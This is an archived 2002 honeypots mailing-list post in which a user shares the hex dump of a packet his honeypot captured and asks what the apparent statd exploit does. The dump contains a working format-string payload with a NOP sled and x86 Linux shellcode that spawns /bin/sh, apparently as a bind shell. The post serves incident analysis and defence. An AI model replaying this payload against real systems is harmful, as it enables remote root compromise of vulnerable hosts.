Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

honeypots logo Honeypots mailing list archives

statd exploit ???
From: "Sriram Newsgroups" <srinews () hotmail com>
Date: Wed, 30 Oct 2002 16:29:35 -0600

My honeypt recorded this  packet. It looks to be a statd exploit (port
32768). I can't narrow it down to what exactly this exploit does or its nature.

Here is the sample packet

10/25-17:41:34.464523 24.123.46.10:847 -> x.x.x.linux:32768
UDP TTL:47 TOS:0x0 ID:51930 IpLen:20 DgmLen:1104
Len: 1084
51 1B 5D 1C 00 00 00 00 00 00 00 02 00 01 86 B8  Q.].............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ...............
3D B9 D6 3B 00 00 00 09 6C 6F 63 61 6C 68 6F 73  =..;....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 1A F7 FF BF 1A F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 36 32 37 31 36 78 25 68  x%8x%8x%62716x%h
6E 25 35 31 38 35 39 78 25 68 6E 90 90 90 90 90  n%51859x%hn.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
-------------------------- Reapeted 41 lines ---------------------
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....


My honeypot replied with this

10/25-17:41:34.468306 x.x.x.linux:32768 -> 24.123.46.10:847
UDP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
Len: 40
51 1B 5D 1C 00 00 00 01 00 00 00 00 00 00 00 00  Q.].............
00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2F  .............../


Any ideas ????

Sriram

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]